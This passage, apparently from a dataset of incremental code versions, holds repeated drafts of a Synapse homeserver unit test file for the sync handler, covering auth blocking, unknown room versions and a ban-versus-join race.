you attempt to join a room\n * racing with that is a ban which comes in over federation, which ends up with\n an earlier stream_ordering than the join.\n * you get a sync response with a sync token which is _after_ the ban, but before\n the join\n * now your join lands; it is a valid event because its `prev_event`s predate the\n ban, but will not make it into current_state_events (because bans win over\n joins in state res, essentially).\n * When we do a sync from the incremental sync, the only event in the timeline\n is your join ... and yet you aren't joined.\n\n The ban coming in over federation isn't crucial for this behaviour; the key\n requirements are:\n 1. the homeserver generates a join event with prev_events that precede the ban\n (so that it passes the \"are you banned\" test)\n 2. the join event has a stream_ordering after that of the ban.\n\n We use monkeypatching to artificially trigger condition (1).\n \"\"\"\n owner = self.register_user('alice', 'password')\n owner_tok = self.login(owner, 'password')\n room_id = self.helper.create_room_as(owner, is_public=True, tok=\n owner_tok)\n alice_sync_result: SyncResult = self.get_success(self.sync_handler.\n wait_for_sync_for_user(create_requester(owner),\n generate_sync_config(owner)))\n self.assertEqual(len(alice_sync_result.joined), 1)\n self.assertEqual(alice_sync_result.joined[0].room_id, room_id)\n last_room_creation_event_id = alice_sync_result.joined[0\n ].timeline.events[-1].event_id\n eve = self.register_user('eve', 'password')\n eve_token = self.login(eve, 'password')\n self.helper.ban(room_id, owner, eve, tok=owner_tok)\n eve_requester = create_requester(eve)\n eve_sync_config = generate_sync_config(eve)\n eve_sync_after_ban: SyncResult = self.get_success(self.sync_handler\n .wait_for_sync_for_user(eve_requester, eve_sync_config))\n self.assertEqual(eve_sync_after_ban.joined, [])\n mocked_get_prev_events = patch.object(self.hs.get_datastores().main,\n 'get_prev_events_for_room', new_callable=AsyncMock,\n return_value=[last_room_creation_event_id])\n with mocked_get_prev_events:\n self.helper.join(room_id, eve, tok=eve_token)\n eve_incremental_sync_after_join: SyncResult = self.get_success(self\n .sync_handler.wait_for_sync_for_user(eve_requester,\n eve_sync_config, since_token=eve_sync_after_ban.next_batch))\n self.assertEqual(eve_incremental_sync_after_join.joined, [])\n eve_initial_sync_after_join: SyncResult = self.get_success(self.\n sync_handler.wait_for_sync_for_user(eve_requester,\n eve_sync_config, since_token=None))\n self.assertEqual(eve_initial_sync_after_join.joined, [])\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass SyncTestCase(tests.unittest.HomeserverTestCase):\n \"\"\"Tests Sync Handler.\"\"\"\n servlets = [admin.register_servlets, knock.register_servlets, login.\n register_servlets, room.register_servlets]\n\n def prepare(self, reactor: MemoryReactor, clock: Clock, hs: HomeServer\n ) ->None:\n self.sync_handler = self.hs.get_sync_handler()\n self.store = self.hs.get_datastores().main\n self.auth_blocking = self.hs.get_auth_blocking()\n\n def test_wait_for_sync_for_user_auth_blocking(self) ->None:\n user_id1 = '@user1:test'\n user_id2 = '@user2:test'\n sync_config = generate_sync_config(user_id1)\n requester = create_requester(user_id1)\n self.reactor.advance(100)\n self.auth_blocking._limit_usage_by_mau = True\n self.auth_blocking._max_mau_value = 1\n self.get_success(self.store.upsert_monthly_active_user(user_id1))\n self.get_success(self.sync_handler.wait_for_sync_for_user(requester,\n sync_config))\n self.auth_blocking._hs_disabled = True\n e = self.get_failure(self.sync_handler.wait_for_sync_for_user(\n requester, sync_config), ResourceLimitError)\n self.assertEqual(e.value.errcode, Codes.RESOURCE_LIMIT_EXCEEDED)\n self.auth_blocking._hs_disabled = False\n sync_config = generate_sync_config(user_id2)\n requester = create_requester(user_id2)\n e = self.get_failure(self.sync_handler.wait_for_sync_for_user(\n requester, sync_config), ResourceLimitError)\n self.assertEqual(e.value.errcode, Codes.RESOURCE_LIMIT_EXCEEDED)\n\n def test_unknown_room_version(self) ->None:\n \"\"\"\n A room with an unknown room version should not break sync (and should be excluded).\n \"\"\"\n inviter = self.register_user('creator', 'pass', admin=True)\n inviter_tok = self.login('@creator:test', 'pass')\n user = self.register_user('user', 'pass')\n tok = self.login('user', 'pass')\n requester = create_requester(user)\n initial_result = self.get_success(self.sync_handler.\n wait_for_sync_for_user(requester, sync_config=\n generate_sync_config(user, device_id='dev')))\n joined_room = self.helper.create_room_as(user, tok=tok)\n invite_room = self.helper.create_room_as(inviter, tok=inviter_tok)\n self.helper.invite(invite_room, targ=user, tok=inviter_tok)\n knock_room = self.helper.create_room_as(inviter, room_version=\n RoomVersions.V7.identifier, tok=inviter_tok)\n self.helper.send_state(knock_room, EventTypes.JoinRules, {\n 'join_rule': JoinRules.KNOCK}, tok=inviter_tok)\n channel = self.make_request('POST', '/_matrix/client/r0/knock/%s' %\n (knock_room,), b'{}', tok)\n self.assertEqual(200, channel.code, channel.result)\n result = self.get_success(self.sync_handler.wait_for_sync_for_user(\n requester, sync_config=generate_sync_config(user)))\n self.assertIn(joined_room, [r.room_id for r in result.joined])\n self.assertIn(invite_room, [r.room_id for r in result.invited])\n self.assertIn(knock_room, [r.room_id for r in result.knocked])\n result = self.get_success(self.sync_handler.wait_for_sync_for_user(\n requester, sync_config=generate_sync_config(user, device_id=\n 'dev'), since_token=initial_result.next_batch))\n self.assertIn(joined_room, [r.room_id for r in result.joined])\n self.assertIn(invite_room, [r.room_id for r in result.invited])\n self.assertIn(knock_room, [r.room_id for r in result.knocked])\n for room_id in (joined_room, invite_room, knock_room):\n self.get_success(self.hs.get_datastores().main.db_pool.\n simple_update('rooms', keyvalues={'room_id': room_id},\n updatevalues={'room_version': 'unknown-room-version'}, desc\n ='updated-room-version'))\n self.store.get_rooms_for_user_with_stream_ordering.invalidate_all()\n self.store.get_rooms_for_user.invalidate_all()\n self.store._get_event_cache.clear()\n self.store._event_ref.clear()\n result = self.get_success(self.sync_handler.wait_for_sync_for_user(\n requester, sync_config=generate_sync_config(user)))\n self.assertNotIn(joined_room, [r.room_id for r in result.joined])\n self.assertNotIn(invite_room, [r.room_id for r in result.invited])\n self.assertNotIn(knock_room, [r.room_id for r in result.knocked])\n result = self.get_success(self.sync_handler.wait_for_sync_for_user(\n requester, sync_config=generate_sync_config(user, device_id=\n 'dev'), since_token=initial_result.next_batch))\n self.assertNotIn(joined_room, [r.room_id for r in result.joined])\n self.assertNotIn(invite_room, [r.room_id for r in result.invited])\n self.assertNotIn(knock_room, [r.room_id for r in result.knocked])\n\n def test_ban_wins_race_with_join(self) ->None:\n \"\"\"Rooms shouldn't appear under \"joined\" if a join loses a race to a ban.\n\n A complicated edge case. Imagine the following scenario:\n\n * you attempt to join a room\n * racing with that is a ban which comes in over federation, which ends up with\n an earlier stream_ordering than the join.\n * you get a sync response with a sync token which is _after_ the ban, but before\n the join\n * now your join lands; it is a valid event because its `prev_event`s predate the\n ban, but will not make it into current_state_events (because bans win over\n joins in state res, essentially).\n * When we do a sync from the incremental sync, the only event in the timeline\n is your join ... and yet you aren't joined.\n\n The ban coming in over federation isn't crucial for this behaviour; the key\n requirements are:\n 1. the homeserver generates a join event with prev_events that precede the ban\n (so that it passes the \"are you banned\" test)\n 2. the join event has a stream_ordering after that of the ban.\n\n We use monkeypatching to artificially trigger condition (1).\n \"\"\"\n owner = self.register_user('alice', 'password')\n owner_tok = self.login(owner, 'password')\n room_id = self.helper.create_room_as(owner, is_public=True, tok=\n owner_tok)\n alice_sync_result: SyncResult = self.get_success(self.sync_handler.\n wait_for_sync_for_user(create_requester(owner),\n generate_sync_config(owner)))\n self.assertEqual(len(alice_sync_result.joined), 1)\n self.assertEqual(alice_sync_result.joined[0].room_id, room_id)\n last_room_creation_event_id = alice_sync_result.joined[0\n ].timeline.events[-1].event_id\n eve = self.register_user('eve', 'password')\n eve_token = self.login(eve, 'password')\n self.helper.ban(room_id, owner, eve, tok=owner_tok)\n eve_requester = create_requester(eve)\n eve_sync_config = generate_sync_config(eve)\n eve_sync_after_ban: SyncResult = self.get_success(self.sync_handler\n .wait_for_sync_for_user(eve_requester, eve_sync_config))\n self.assertEqual(eve_sync_after_ban.joined, [])\n mocked_get_prev_events = patch.object(self.hs.get_datastores().main,\n 'get_prev_events_for_room', new_callable=AsyncMock,\n return_value=[last_room_creation_event_id])\n with mocked_get_prev_events:\n self.helper.join(room_id, eve, tok=eve_token)\n eve_incremental_sync_after_join: SyncResult = self.get_success(self\n .sync_handler.wait_for_sync_for_user(eve_requester,\n eve_sync_config, since_token=eve_sync_after_ban.next_batch))\n self.assertEqual(eve_incremental_sync_after_join.joined, [])\n eve_initial_sync_after_join: SyncResult = self.get_success(self.\n sync_handler.wait_for_sync_for_user(eve_requester,\n eve_sync_config, since_token=None))\n self.assertEqual(eve_initial_sync_after_join.joined, [])\n\n\n<mask token>\n\n\ndef generate_sync_config(user_id: str, device_id: Optional[str]='device_id'\n ) ->SyncConfig:\n \"\"\"Generate a sync config (with a unique request key).\"\"\"\n global _request_key\n _request_key += 1\n return SyncConfig(user=UserID.from_string(user_id), filter_collection=\n Filtering(Mock()).DEFAULT_FILTER_COLLECTION, is_guest=False,\n request_key=('request_key', _request_key), device_id=device_id)\n",
"step-3": "<mask token>\n\n\nclass SyncTestCase(tests.unittest.HomeserverTestCase):\n \"\"\"Tests Sync Handler.\"\"\"\n servlets = [admin.register_servlets, knock.register_servlets, login.\n register_servlets, room.register_servlets]\n\n def prepare(self, reactor: MemoryReactor, clock: Clock, hs: HomeServer\n ) ->None:\n self.sync_handler = self.hs.get_sync_handler()\n self.store = self.hs.get_datastores().main\n self.auth_blocking = self.hs.get_auth_blocking()\n\n def test_wait_for_sync_for_user_auth_blocking(self) ->None:\n user_id1 = '@user1:test'\n user_id2 = '@user2:test'\n sync_config = generate_sync_config(user_id1)\n requester = create_requester(user_id1)\n self.reactor.advance(100)\n self.auth_blocking._limit_usage_by_mau = True\n self.auth_blocking._max_mau_value = 1\n self.get_success(self.store.upsert_monthly_active_user(user_id1))\n self.get_success(self.sync_handler.wait_for_sync_for_user(requester,\n sync_config))\n self.auth_blocking._hs_disabled = True\n e = self.get_failure(self.sync_handler.wait_for_sync_for_user(\n requester, sync_config), ResourceLimitError)\n self.assertEqual(e.value.errcode, Codes.RESOURCE_LIMIT_EXCEEDED)\n self.auth_blocking._hs_disabled = False\n sync_config = generate_sync_config(user_id2)\n requester = create_requester(user_id2)\n e = self.get_failure(self.sync_handler.wait_for_sync_for_user(\n requester, sync_config), ResourceLimitError)\n self.assertEqual(e.value.errcode, Codes.RESOURCE_LIMIT_EXCEEDED)\n\n def test_unknown_room_version(self) ->None:\n \"\"\"\n A room with an unknown room version should not break sync (and should be excluded).\n \"\"\"\n inviter = self.register_user('creator', 'pass', admin=True)\n inviter_tok = self.login('@creator:test', 'pass')\n user = self.register_user('user', 'pass')\n tok = self.login('user', 'pass')\n requester = create_requester(user)\n initial_result = self.get_success(self.sync_handler.\n wait_for_sync_for_user(requester, sync_config=\n generate_sync_config(user, device_id='dev')))\n joined_room = self.helper.create_room_as(user, tok=tok)\n invite_room = self.helper.create_room_as(inviter, tok=inviter_tok)\n self.helper.invite(invite_room, targ=user, tok=inviter_tok)\n knock_room = self.helper.create_room_as(inviter, room_version=\n RoomVersions.V7.identifier, tok=inviter_tok)\n self.helper.send_state(knock_room, EventTypes.JoinRules, {\n 'join_rule': JoinRules.KNOCK}, tok=inviter_tok)\n channel = self.make_request('POST', '/_matrix/client/r0/knock/%s' %\n (knock_room,), b'{}', tok)\n self.assertEqual(200, channel.code, channel.result)\n result = self.get_success(self.sync_handler.wait_for_sync_for_user(\n requester, sync_config=generate_sync_config(user)))\n self.assertIn(joined_room, [r.room_id for r in result.joined])\n self.assertIn(invite_room, [r.room_id for r in result.invited])\n self.assertIn(knock_room, [r.room_id for r in result.knocked])\n result = self.get_success(self.sync_handler.wait_for_sync_for_user(\n requester, sync_config=generate_sync_config(user, device_id=\n 'dev'), since_token=initial_result.next_batch))\n self.assertIn(joined_room, [r.room_id for r in result.joined])\n self.assertIn(invite_room, [r.room_id for r in result.invited])\n self.assertIn(knock_room, [r.room_id for r in result.knocked])\n for room_id in (joined_room, invite_room, knock_room):\n self.get_success(self.hs.get_datastores().main.db_pool.\n simple_update('rooms', keyvalues={'room_id': room_id},\n updatevalues={'room_version': 'unknown-room-version'}, desc\n ='updated-room-version'))\n self.store.get_rooms_for_user_with_stream_ordering.invalidate_all()\n self.store.get_rooms_for_user.invalidate_all()\n self.store._get_event_cache.clear()\n self.store._event_ref.clear()\n result = self.get_success(self.sync_handler.wait_for_sync_for_user(\n requester, sync_config=generate_sync_config(user)))\n self.assertNotIn(joined_room, [r.room_id for r in result.joined])\n self.assertNotIn(invite_room, [r.room_id for r in result.invited])\n self.assertNotIn(knock_room, [r.room_id for r in result.knocked])\n result = self.get_success(self.sync_handler.wait_for_sync_for_user(\n requester, sync_config=generate_sync_config(user, device_id=\n 'dev'), since_token=initial_result.next_batch))\n self.assertNotIn(joined_room, [r.room_id for r in result.joined])\n self.assertNotIn(invite_room, [r.room_id for r in result.invited])\n self.assertNotIn(knock_room, [r.room_id for r in result.knocked])\n\n def test_ban_wins_race_with_join(self) ->None:\n \"\"\"Rooms shouldn't appear under \"joined\" if a join loses a race to a ban.\n\n A complicated edge case. Imagine the following scenario:\n\n * you attempt to join a room\n * racing with that is a ban which comes in over federation, which ends up with\n an earlier stream_ordering than the join.\n * you get a sync response with a sync token which is _after_ the ban, but before\n the join\n * now your join lands; it is a valid event because its `prev_event`s predate the\n ban, but will not make it into current_state_events (because bans win over\n joins in state res, essentially).\n * When we do a sync from the incremental sync, the only event in the timeline\n is your join ... and yet you aren't joined.\n\n The ban coming in over federation isn't crucial for this behaviour; the key\n requirements are:\n 1. the homeserver generates a join event with prev_events that precede the ban\n (so that it passes the \"are you banned\" test)\n 2. the join event has a stream_ordering after that of the ban.\n\n We use monkeypatching to artificially trigger condition (1).\n \"\"\"\n owner = self.register_user('alice', 'password')\n owner_tok = self.login(owner, 'password')\n room_id = self.helper.create_room_as(owner, is_public=True, tok=\n owner_tok)\n alice_sync_result: SyncResult = self.get_success(self.sync_handler.\n wait_for_sync_for_user(create_requester(owner),\n generate_sync_config(owner)))\n self.assertEqual(len(alice_sync_result.joined), 1)\n self.assertEqual(alice_sync_result.joined[0].room_id, room_id)\n last_room_creation_event_id = alice_sync_result.joined[0\n ].timeline.events[-1].event_id\n eve = self.register_user('eve', 'password')\n eve_token = self.login(eve, 'password')\n self.helper.ban(room_id, owner, eve, tok=owner_tok)\n eve_requester = create_requester(eve)\n eve_sync_config = generate_sync_config(eve)\n eve_sync_after_ban: SyncResult = self.get_success(self.sync_handler\n .wait_for_sync_for_user(eve_requester, eve_sync_config))\n self.assertEqual(eve_sync_after_ban.joined, [])\n mocked_get_prev_events = patch.object(self.hs.get_datastores().main,\n 'get_prev_events_for_room', new_callable=AsyncMock,\n return_value=[last_room_creation_event_id])\n with mocked_get_prev_events:\n self.helper.join(room_id, eve, tok=eve_token)\n eve_incremental_sync_after_join: SyncResult = self.get_success(self\n .sync_handler.wait_for_sync_for_user(eve_requester,\n eve_sync_config, since_token=eve_sync_after_ban.next_batch))\n self.assertEqual(eve_incremental_sync_after_join.joined, [])\n eve_initial_sync_after_join: SyncResult = self.get_success(self.\n sync_handler.wait_for_sync_for_user(eve_requester,\n eve_sync_config, since_token=None))\n self.assertEqual(eve_initial_sync_after_join.joined, [])\n\n\n_request_key = 0\n\n\ndef generate_sync_config(user_id: str, device_id: Optional[str]='device_id'\n ) ->SyncConfig:\n \"\"\"Generate a sync config (with a unique request key).\"\"\"\n global _request_key\n _request_key += 1\n return SyncConfig(user=UserID.from_string(user_id), filter_collection=\n Filtering(Mock()).DEFAULT_FILTER_COLLECTION, is_guest=False,\n request_key=('request_key', _request_key), device_id=device_id)\n",
"step-4": "from typing import Optional\nfrom unittest.mock import AsyncMock, Mock, patch\nfrom twisted.test.proto_helpers import MemoryReactor\nfrom synapse.api.constants import EventTypes, JoinRules\nfrom synapse.api.errors import Codes, ResourceLimitError\nfrom synapse.api.filtering import Filtering\nfrom synapse.api.room_versions import RoomVersions\nfrom synapse.handlers.sync import SyncConfig, SyncResult\nfrom synapse.rest import admin\nfrom synapse.rest.client import knock, login, room\nfrom synapse.server import HomeServer\nfrom synapse.types import UserID, create_requester\nfrom synapse.util import Clock\nimport tests.unittest\nimport tests.utils\n\n\nclass SyncTestCase(tests.unittest.HomeserverTestCase):\n \"\"\"Tests Sync Handler.\"\"\"\n servlets = [admin.register_servlets, knock.register_servlets, login.\n register_servlets, room.register_servlets]\n\n def prepare(self, reactor: MemoryReactor, clock: Clock, hs: HomeServer\n ) ->None:\n self.sync_handler = self.hs.get_sync_handler()\n self.store = self.hs.get_datastores().main\n self.auth_blocking = self.hs.get_auth_blocking()\n\n def test_wait_for_sync_for_user_auth_blocking(self) ->None:\n user_id1 = '@user1:test'\n user_id2 = '@user2:test'\n sync_config = generate_sync_config(user_id1)\n requester = create_requester(user_id1)\n self.reactor.advance(100)\n self.auth_blocking._limit_usage_by_mau = True\n self.auth_blocking._max_mau_value = 1\n self.get_success(self.store.upsert_monthly_active_user(user_id1))\n self.get_success(self.sync_handler.wait_for_sync_for_user(requester,\n sync_config))\n self.auth_blocking._hs_disabled = True\n e = self.get_failure(self.sync_handler.wait_for_sync_for_user(\n requester, sync_config), ResourceLimitError)\n self.assertEqual(e.value.errcode, Codes.RESOURCE_LIMIT_EXCEEDED)\n self.auth_blocking._hs_disabled = False\n sync_config = generate_sync_config(user_id2)\n requester = create_requester(user_id2)\n e = self.get_failure(self.sync_handler.wait_for_sync_for_user(\n requester, sync_config), ResourceLimitError)\n self.assertEqual(e.value.errcode, Codes.RESOURCE_LIMIT_EXCEEDED)\n\n def test_unknown_room_version(self) ->None:\n \"\"\"\n A room with an unknown room version should not break sync (and should be excluded).\n \"\"\"\n inviter = self.register_user('creator', 'pass', admin=True)\n inviter_tok = self.login('@creator:test', 'pass')\n user = self.register_user('user', 'pass')\n tok = self.login('user', 'pass')\n requester = create_requester(user)\n initial_result = self.get_success(self.sync_handler.\n wait_for_sync_for_user(requester, sync_config=\n generate_sync_config(user, device_id='dev')))\n joined_room = self.helper.create_room_as(user, tok=tok)\n invite_room = self.helper.create_room_as(inviter, tok=inviter_tok)\n self.helper.invite(invite_room, targ=user, tok=inviter_tok)\n knock_room = self.helper.create_room_as(inviter, room_version=\n RoomVersions.V7.identifier, tok=inviter_tok)\n self.helper.send_state(knock_room, EventTypes.JoinRules, {\n 'join_rule': JoinRules.KNOCK}, tok=inviter_tok)\n channel = self.make_request('POST', '/_matrix/client/r0/knock/%s' %\n (knock_room,), b'{}', tok)\n self.assertEqual(200, channel.code, channel.result)\n result = self.get_success(self.sync_handler.wait_for_sync_for_user(\n requester, sync_config=generate_sync_config(user)))\n self.assertIn(joined_room, [r.room_id for r in result.joined])\n self.assertIn(invite_room, [r.room_id for r in result.invited])\n self.assertIn(knock_room, [r.room_id for r in result.knocked])\n result = self.get_success(self.sync_handler.wait_for_sync_for_user(\n requester, sync_config=generate_sync_config(user, device_id=\n 'dev'), since_token=initial_result.next_batch))\n self.assertIn(joined_room, [r.room_id for r in result.joined])\n self.assertIn(invite_room, [r.room_id for r in result.invited])\n self.assertIn(knock_room, [r.room_id for r in result.knocked])\n for room_id in (joined_room, invite_room, knock_room):\n self.get_success(self.hs.get_datastores().main.db_pool.\n simple_update('rooms', keyvalues={'room_id': room_id},\n updatevalues={'room_version': 'unknown-room-version'}, desc\n ='updated-room-version'))\n self.store.get_rooms_for_user_with_stream_ordering.invalidate_all()\n self.store.get_rooms_for_user.invalidate_all()\n self.store._get_event_cache.clear()\n self.store._event_ref.clear()\n result = self.get_success(self.sync_handler.wait_for_sync_for_user(\n requester, sync_config=generate_sync_config(user)))\n self.assertNotIn(joined_room, [r.room_id for r in result.joined])\n self.assertNotIn(invite_room, [r.room_id for r in result.invited])\n self.assertNotIn(knock_room, [r.room_id for r in result.knocked])\n result = self.get_success(self.sync_handler.wait_for_sync_for_user(\n requester, sync_config=generate_sync_config(user, device_id=\n 'dev'), since_token=initial_result.next_batch))\n self.assertNotIn(joined_room, [r.room_id for r in result.joined])\n self.assertNotIn(invite_room, [r.room_id for r in result.invited])\n self.assertNotIn(knock_room, [r.room_id for r in result.knocked])\n\n def test_ban_wins_race_with_join(self) ->None:\n \"\"\"Rooms shouldn't appear under \"joined\" if a join loses a race to a ban.\n\n A complicated edge case. Imagine the following scenario:\n\n * you attempt to join a room\n * racing with that is a ban which comes in over federation, which ends up with\n an earlier stream_ordering than the join.\n * you get a sync response with a sync token which is _after_ the ban, but before\n the join\n * now your join lands; it is a valid event because its `prev_event`s predate the\n ban, but will not make it into current_state_events (because bans win over\n joins in state res, essentially).\n * When we do a sync from the incremental sync, the only event in the timeline\n is your join ... and yet you aren't joined.\n\n The ban coming in over federation isn't crucial for this behaviour; the key\n requirements are:\n 1. the homeserver generates a join event with prev_events that precede the ban\n (so that it passes the \"are you banned\" test)\n 2. the join event has a stream_ordering after that of the ban.\n\n We use monkeypatching to artificially trigger condition (1).\n \"\"\"\n owner = self.register_user('alice', 'password')\n owner_tok = self.login(owner, 'password')\n room_id = self.helper.create_room_as(owner, is_public=True, tok=\n owner_tok)\n alice_sync_result: SyncResult = self.get_success(self.sync_handler.\n wait_for_sync_for_user(create_requester(owner),\n generate_sync_config(owner)))\n self.assertEqual(len(alice_sync_result.joined), 1)\n self.assertEqual(alice_sync_result.joined[0].room_id, room_id)\n last_room_creation_event_id = alice_sync_result.joined[0\n ].timeline.events[-1].event_id\n eve = self.register_user('eve', 'password')\n eve_token = self.login(eve, 'password')\n self.helper.ban(room_id, owner, eve, tok=owner_tok)\n eve_requester = create_requester(eve)\n eve_sync_config = generate_sync_config(eve)\n eve_sync_after_ban: SyncResult = self.get_success(self.sync_handler\n .wait_for_sync_for_user(eve_requester, eve_sync_config))\n self.assertEqual(eve_sync_after_ban.joined, [])\n mocked_get_prev_events = patch.object(self.hs.get_datastores().main,\n 'get_prev_events_for_room', new_callable=AsyncMock,\n return_value=[last_room_creation_event_id])\n with mocked_get_prev_events:\n self.helper.join(room_id, eve, tok=eve_token)\n eve_incremental_sync_after_join: SyncResult = self.get_success(self\n .sync_handler.wait_for_sync_for_user(eve_requester,\n eve_sync_config, since_token=eve_sync_after_ban.next_batch))\n self.assertEqual(eve_incremental_sync_after_join.joined, [])\n eve_initial_sync_after_join: SyncResult = self.get_success(self.\n sync_handler.wait_for_sync_for_user(eve_requester,\n eve_sync_config, since_token=None))\n self.assertEqual(eve_initial_sync_after_join.joined, [])\n\n\n_request_key = 0\n\n\ndef generate_sync_config(user_id: str, device_id: Optional[str]='device_id'\n ) ->SyncConfig:\n \"\"\"Generate a sync config (with a unique request key).\"\"\"\n global _request_key\n _request_key += 1\n return SyncConfig(user=UserID.from_string(user_id), filter_collection=\n Filtering(Mock()).DEFAULT_FILTER_COLLECTION, is_guest=False,\n request_key=('request_key', _request_key), device_id=device_id)\n",
"step-5": "# Copyright 2018 New Vector Ltd\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nfrom typing import Optional\nfrom unittest.mock import AsyncMock, Mock, patch\n\nfrom twisted.test.proto_helpers import MemoryReactor\n\nfrom synapse.api.constants import EventTypes, JoinRules\nfrom synapse.api.errors import Codes, ResourceLimitError\nfrom synapse.api.filtering import Filtering\nfrom synapse.api.room_versions import RoomVersions\nfrom synapse.handlers.sync import SyncConfig, SyncResult\nfrom synapse.rest import admin\nfrom synapse.rest.client import knock, login, room\nfrom synapse.server import HomeServer\nfrom synapse.types import UserID, create_requester\nfrom synapse.util import Clock\n\nimport tests.unittest\nimport tests.utils\n\n\nclass SyncTestCase(tests.unittest.HomeserverTestCase):\n \"\"\"Tests Sync Handler.\"\"\"\n\n servlets = [\n admin.register_servlets,\n knock.register_servlets,\n login.register_servlets,\n room.register_servlets,\n ]\n\n def prepare(self, reactor: MemoryReactor, clock: Clock, hs: HomeServer) -> None:\n self.sync_handler = self.hs.get_sync_handler()\n self.store = self.hs.get_datastores().main\n\n # AuthBlocking reads from the hs' config on initialization. We need to\n # modify its config instead of the hs'\n self.auth_blocking = self.hs.get_auth_blocking()\n\n def test_wait_for_sync_for_user_auth_blocking(self) -> None:\n user_id1 = \"@user1:test\"\n user_id2 = \"@user2:test\"\n sync_config = generate_sync_config(user_id1)\n requester = create_requester(user_id1)\n\n self.reactor.advance(100) # So we get not 0 time\n self.auth_blocking._limit_usage_by_mau = True\n self.auth_blocking._max_mau_value = 1\n\n # Check that the happy case does not throw errors\n self.get_success(self.store.upsert_monthly_active_user(user_id1))\n self.get_success(\n self.sync_handler.wait_for_sync_for_user(requester, sync_config)\n )\n\n # Test that global lock works\n self.auth_blocking._hs_disabled = True\n e = self.get_failure(\n self.sync_handler.wait_for_sync_for_user(requester, sync_config),\n ResourceLimitError,\n )\n self.assertEqual(e.value.errcode, Codes.RESOURCE_LIMIT_EXCEEDED)\n\n self.auth_blocking._hs_disabled = False\n\n sync_config = generate_sync_config(user_id2)\n requester = create_requester(user_id2)\n\n e = self.get_failure(\n self.sync_handler.wait_for_sync_for_user(requester, sync_config),\n ResourceLimitError,\n )\n self.assertEqual(e.value.errcode, Codes.RESOURCE_LIMIT_EXCEEDED)\n\n def test_unknown_room_version(self) -> None:\n \"\"\"\n A room with an unknown room version should not break sync (and should be excluded).\n \"\"\"\n inviter = self.register_user(\"creator\", \"pass\", admin=True)\n inviter_tok = self.login(\"@creator:test\", \"pass\")\n\n user = self.register_user(\"user\", \"pass\")\n tok = self.login(\"user\", \"pass\")\n\n # Do an initial sync on a different device.\n requester = create_requester(user)\n initial_result = self.get_success(\n self.sync_handler.wait_for_sync_for_user(\n requester, sync_config=generate_sync_config(user, device_id=\"dev\")\n )\n )\n\n # Create a room as the user.\n joined_room = self.helper.create_room_as(user, tok=tok)\n\n # Invite the user to the room as someone else.\n invite_room = self.helper.create_room_as(inviter, tok=inviter_tok)\n self.helper.invite(invite_room, targ=user, tok=inviter_tok)\n\n knock_room = self.helper.create_room_as(\n inviter, room_version=RoomVersions.V7.identifier, tok=inviter_tok\n )\n self.helper.send_state(\n knock_room,\n EventTypes.JoinRules,\n {\"join_rule\": JoinRules.KNOCK},\n tok=inviter_tok,\n )\n channel = self.make_request(\n \"POST\",\n \"/_matrix/client/r0/knock/%s\" % (knock_room,),\n b\"{}\",\n tok,\n )\n self.assertEqual(200, channel.code, channel.result)\n\n # The rooms should appear in the sync response.\n result = self.get_success(\n self.sync_handler.wait_for_sync_for_user(\n requester, sync_config=generate_sync_config(user)\n )\n )\n self.assertIn(joined_room, [r.room_id for r in result.joined])\n self.assertIn(invite_room, [r.room_id for r in result.invited])\n self.assertIn(knock_room, [r.room_id for r in result.knocked])\n\n # Test a incremental sync (by providing a since_token).\n result = self.get_success(\n self.sync_handler.wait_for_sync_for_user(\n requester,\n sync_config=generate_sync_config(user, device_id=\"dev\"),\n since_token=initial_result.next_batch,\n )\n )\n self.assertIn(joined_room, [r.room_id for r in result.joined])\n self.assertIn(invite_room, [r.room_id for r in result.invited])\n self.assertIn(knock_room, [r.room_id for r in result.knocked])\n\n # Poke the database and update the room version to an unknown one.\n for room_id in (joined_room, invite_room, knock_room):\n self.get_success(\n self.hs.get_datastores().main.db_pool.simple_update(\n \"rooms\",\n keyvalues={\"room_id\": room_id},\n updatevalues={\"room_version\": \"unknown-room-version\"},\n desc=\"updated-room-version\",\n )\n )\n\n # Blow away caches (supported room versions can only change due to a restart).\n self.store.get_rooms_for_user_with_stream_ordering.invalidate_all()\n self.store.get_rooms_for_user.invalidate_all()\n self.store._get_event_cache.clear()\n self.store._event_ref.clear()\n\n # The rooms should be excluded from the sync response.\n # Get a new request key.\n result = self.get_success(\n self.sync_handler.wait_for_sync_for_user(\n requester, sync_config=generate_sync_config(user)\n )\n )\n self.assertNotIn(joined_room, [r.room_id for r in result.joined])\n self.assertNotIn(invite_room, [r.room_id for r in result.invited])\n self.assertNotIn(knock_room, [r.room_id for r in result.knocked])\n\n # The rooms should also not be in an incremental sync.\n result = self.get_success(\n self.sync_handler.wait_for_sync_for_user(\n requester,\n sync_config=generate_sync_config(user, device_id=\"dev\"),\n since_token=initial_result.next_batch,\n )\n )\n self.assertNotIn(joined_room, [r.room_id for r in result.joined])\n self.assertNotIn(invite_room, [r.room_id for r in result.invited])\n self.assertNotIn(knock_room, [r.room_id for r in result.knocked])\n\n def test_ban_wins_race_with_join(self) -> None:\n \"\"\"Rooms shouldn't appear under \"joined\" if a join loses a race to a ban.\n\n A complicated edge case. Imagine the following scenario:\n\n * you attempt to join a room\n * racing with that is a ban which comes in over federation, which ends up with\n an earlier stream_ordering than the join.\n * you get a sync response with a sync token which is _after_ the ban, but before\n the join\n * now your join lands; it is a valid event because its `prev_event`s predate the\n ban, but will not make it into current_state_events (because bans win over\n joins in state res, essentially).\n * When we do a sync from the incremental sync, the only event in the timeline\n is your join ... and yet you aren't joined.\n\n The ban coming in over federation isn't crucial for this behaviour; the key\n requirements are:\n 1. the homeserver generates a join event with prev_events that precede the ban\n (so that it passes the \"are you banned\" test)\n 2. the join event has a stream_ordering after that of the ban.\n\n We use monkeypatching to artificially trigger condition (1).\n \"\"\"\n # A local user Alice creates a room.\n owner = self.register_user(\"alice\", \"password\")\n owner_tok = self.login(owner, \"password\")\n room_id = self.helper.create_room_as(owner, is_public=True, tok=owner_tok)\n\n # Do a sync as Alice to get the latest event in the room.\n alice_sync_result: SyncResult = self.get_success(\n self.sync_handler.wait_for_sync_for_user(\n create_requester(owner), generate_sync_config(owner)\n )\n )\n self.assertEqual(len(alice_sync_result.joined), 1)\n 